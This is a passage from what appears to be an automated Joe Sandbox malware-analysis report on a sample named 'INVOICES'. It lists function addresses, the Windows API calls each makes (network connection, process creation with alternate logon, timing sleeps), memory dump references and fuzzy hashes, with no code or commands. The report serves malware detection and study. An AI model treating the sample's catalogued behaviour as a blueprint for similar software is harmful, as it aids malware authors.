                                                                                                                                  • Opcode Fuzzy Hash: 266a6747c2e3f7a2e9cab71977098bbded40707009137c2e758bc259fe56282c
                                                                                                                                  • Instruction Fuzzy Hash: CB115772904204FAEB0077A49C8AEFD7B6DAF41326F14411AF50453183DEAC588943E5
                                                                                                                                  Function 007A187D Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007A18B9
                                                                                                                                    • Part of subcall function 007A1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007A1962
                                                                                                                                    • Part of subcall function 007A1943: InternetCloseHandle.WININET(00000000), ref: 007A19FF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1463438336-0
                                                                                                                                  • Opcode ID: 2c970dba344ed1dc75e8460517aafd187a2b2338dfa8cc37c1cb23704a663bbe
                                                                                                                                  • Instruction ID: cadb81b617c3965693aa84eca614bb9aa8c6e3e0a8d780b2c4f0ac4340bb444f
                                                                                                                                  • Opcode Fuzzy Hash: 2c970dba344ed1dc75e8460517aafd187a2b2338dfa8cc37c1cb23704a663bbe
                                                                                                                                  • Instruction Fuzzy Hash: 84210131200701BFEB158F648C10FBBB7ADFF8A700F50422AFA0596251CB39E821D790
                                                                                                                                  Function 00793A6E Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,007BFAC0), ref: 00793AA8
                                                                                                                                  • GetLastError.KERNEL32 ref: 00793AB7
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00793AC6
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007BFAC0), ref: 00793B23
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2267087916-0
                                                                                                                                  • Opcode ID: 6e6bfca1063b0560785c78477d943ddfeb2cc62e956595b427f715f8281fa757
                                                                                                                                  • Instruction ID: 874e92dca6191870a003a08b22997dcce458b174156261dd687d519521ae2611
                                                                                                                                  • Opcode Fuzzy Hash: 6e6bfca1063b0560785c78477d943ddfeb2cc62e956595b427f715f8281fa757
                                                                                                                                  • Instruction Fuzzy Hash: 8021B1B05082019FCB10DF28DC8499EB7E8EE15724F148A1AF499C72A2D7389E05CB82
                                                                                                                                  Function 00765262 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 00765281
                                                                                                                                    • Part of subcall function 0075588C: __FF_MSGBANNER.LIBCMT ref: 007558A3
                                                                                                                                    • Part of subcall function 0075588C: __NMSG_WRITE.LIBCMT ref: 007558AA
                                                                                                                                    • Part of subcall function 0075588C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001), ref: 007558CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                  • Opcode ID: b71a3a4505c18e5f2a0ab355606578f00e5aeb29851e7a1bbff0066d33627902
                                                                                                                                  • Instruction ID: fbba1d40988e5deea8ef49e11fce7e050fa125cd03847ae8ab1262e102b73a6d
                                                                                                                                  • Opcode Fuzzy Hash: b71a3a4505c18e5f2a0ab355606578f00e5aeb29851e7a1bbff0066d33627902
                                                                                                                                  • Instruction Fuzzy Hash: 13110A72501A15DFDB203F74AC1979E3798BF00362F204629FC06EA150DE7C8D449765
                                                                                                                                  Function 00734531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00734560
                                                                                                                                    • Part of subcall function 0073410D: _memset.LIBCMT ref: 0073418D
                                                                                                                                    • Part of subcall function 0073410D: _wcscpy.LIBCMT ref: 007341E1
                                                                                                                                    • Part of subcall function 0073410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007341F1
                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 007345B5
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007345C4
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0076D5FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                  • Opcode ID: d32b7c23052b50aa8c48994cb042a729fff84f68c206551887d812584f88fae3
                                                                                                                                  • Instruction ID: 91ff92232e47d0a5e8aebbc61c1042fea1d15244c66ced3f04a41c8d45987c75
                                                                                                                                  • Opcode Fuzzy Hash: d32b7c23052b50aa8c48994cb042a729fff84f68c206551887d812584f88fae3
                                                                                                                                  • Instruction Fuzzy Hash: 9921C8B0D047849FEB328B24DC59BE7BBECAB11308F04409EE69B56142D7782E94CB55
                                                                                                                                  Function 007888D9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0078890A
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00788911
                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 0078892B
                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0078895A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2621361867-0
                                                                                                                                  • Opcode ID: fc488c731c6e4aff114502a0b1a41a1bb27079fa6cd2c7c3e8321869c81d0e11
                                                                                                                                  • Instruction ID: 6e0cae7a23feedc46e7b51385fd009ca6c8953c3ef4dc4b37534ca7fa0386efb
                                                                                                                                  • Opcode Fuzzy Hash: fc488c731c6e4aff114502a0b1a41a1bb27079fa6cd2c7c3e8321869c81d0e11
                                                                                                                                  • Instruction Fuzzy Hash: 42115C72540209ABDF01DFA8DD49FEE7BA9FF08708F444164FE04A2160C7799D609B62
                                                                                                                                  Function 007A647F Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0079793F,?,?,00000000), ref: 00735B8C
                                                                                                                                    • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0079793F,?,?,00000000,?,?), ref: 00735BB0
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 007A64AF
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A64BA
                                                                                                                                  • _memmove.LIBCMT ref: 007A64E7
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 007A64F2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1504782959-0
                                                                                                                                  • Opcode ID: 3a02811e8f2af38f5b0c60212c6736572ef4165120a268e6690b892f88de9c05
                                                                                                                                  • Instruction ID: 4395efff8b82fd377c7cafdfdc4252a98d14ba32886e9546b19a4d788f58c5f1
                                                                                                                                  • Opcode Fuzzy Hash: 3a02811e8f2af38f5b0c60212c6736572ef4165120a268e6690b892f88de9c05
                                                                                                                                  • Instruction Fuzzy Hash: 64115E71900508EFCB04FBA4DD8ADEEB7B8AF48310B148165F506A7162DF78AF14DB61
                                                                                                                                  Function 00788E03 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00788E23
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00788E35
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00788E4B
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00788E66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: edd0008a04626a5eb79c6ac005bfcde0a6ef73fe646941b27a8cf4735f844f52
                                                                                                                                  • Instruction ID: 28dbbd9fed5abd86ca727603fe0f419a06c0c8d6ce7e1c36d70e7a681c8c03d3
                                                                                                                                  • Opcode Fuzzy Hash: edd0008a04626a5eb79c6ac005bfcde0a6ef73fe646941b27a8cf4735f844f52
                                                                                                                                  • Instruction Fuzzy Hash: E4114879940218FFEB10EFA5CC84E9DBBB8FB08710F204195E900B7290DA716E10DB94
                                                                                                                                  Function 00791473 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 00791490
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 007914B5
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 007914BF
                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 007914F2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2875609808-0
                                                                                                                                  • Opcode ID: d3d046c173c85e922d5c8ed8c9d2400e8c45fd2f22b6056047fc6b52f16ee717
                                                                                                                                  • Instruction ID: 861a5a1f009af62ce79a7157eeb6c4223d2360e0eb6a5a216c1fb2fc90159860
                                                                                                                                  • Opcode Fuzzy Hash: d3d046c173c85e922d5c8ed8c9d2400e8c45fd2f22b6056047fc6b52f16ee717
                                                                                                                                  • Instruction Fuzzy Hash: 7B117C32C0056EDBCF00DFA9E989BEEBB78FF0DB11F808555E941B6250CB3895608B95
                                                                                                                                  Function 00767137 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                  • Instruction ID: 052db0b7ee9de9936c5f9b006e796218bb09c1f62ac7553912992fdbfd9f66f9
                                                                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                  • Instruction Fuzzy Hash: 7D017E3204814EFBCF1A5E84CC058EE3F26BF59388B188416FE1958131C33AC9B1EB81
                                                                                                                                  Function 007BB2F9 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 007BB318
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 007BB330
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 007BB354
                                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007BB36F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                  • Opcode ID: 1768d1364cf5199b18b484b2d816885610e9101d3400af4cb6b28ab3f0ab30af
                                                                                                                                  • Instruction ID: 6b3576189bf0a4965251ab7b7306fc54e377c6840c1deb43c57a0ac66b8a9cf2
                                                                                                                                  • Opcode Fuzzy Hash: 1768d1364cf5199b18b484b2d816885610e9101d3400af4cb6b28ab3f0ab30af
                                                                                                                                  • Instruction Fuzzy Hash: A3114675D00209EFDB41CF99C844AEEBBF5FB08314F108166E914E3220D775AA558F54
                                                                                                                                  Function 007BB669 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007BB678
                                                                                                                                  • _memset.LIBCMT ref: 007BB687
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007F6F20,007F6F64), ref: 007BB6B6
                                                                                                                                  • CloseHandle.KERNEL32 ref: 007BB6C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3277943733-0
                                                                                                                                  • Opcode ID: 14637baa2a88c60bc3b987affde9990ff86f12ce5a9ad5ece0f43dda8c1efa19
                                                                                                                                  • Instruction ID: 207d2638896e7dfa93e255948bfd14987e15346e2ab735958e21b74834eda068
                                                                                                                                  • Opcode Fuzzy Hash: 14637baa2a88c60bc3b987affde9990ff86f12ce5a9ad5ece0f43dda8c1efa19
                                                                                                                                  • Instruction Fuzzy Hash: 90F0F4B1540304BAE2102765BC05FB77BDDEB05755F048035FA08D6196D77E5C10C7AC
                                                                                                                                  Function 00796C83 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00796C8F
                                                                                                                                    • Part of subcall function 0079776D: _memset.LIBCMT ref: 007977A2
                                                                                                                                  • _memmove.LIBCMT ref: 00796CB2
                                                                                                                                  • _memset.LIBCMT ref: 00796CBF
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00796CCF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 48991266-0
                                                                                                                                  • Opcode ID: eb1a308546a1bcc6b648e184c60f185a6207898afba9d692b8e2a84259081f3c
                                                                                                                                  • Instruction ID: 637cfe2b3bc0768916f2c4b97d00cbe8a97935397515d411543ef1fc0821a9dc
                                                                                                                                  • Opcode Fuzzy Hash: eb1a308546a1bcc6b648e184c60f185a6207898afba9d692b8e2a84259081f3c
                                                                                                                                  • Instruction Fuzzy Hash: 3FF0303A104104ABCF416F95EC89E89BB29FF45321B04C065FE089E25AC775A811CBB5
                                                                                                                                  Function 0078A15C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0078A179
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0078A18C
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0078A193
                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 0078A19A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
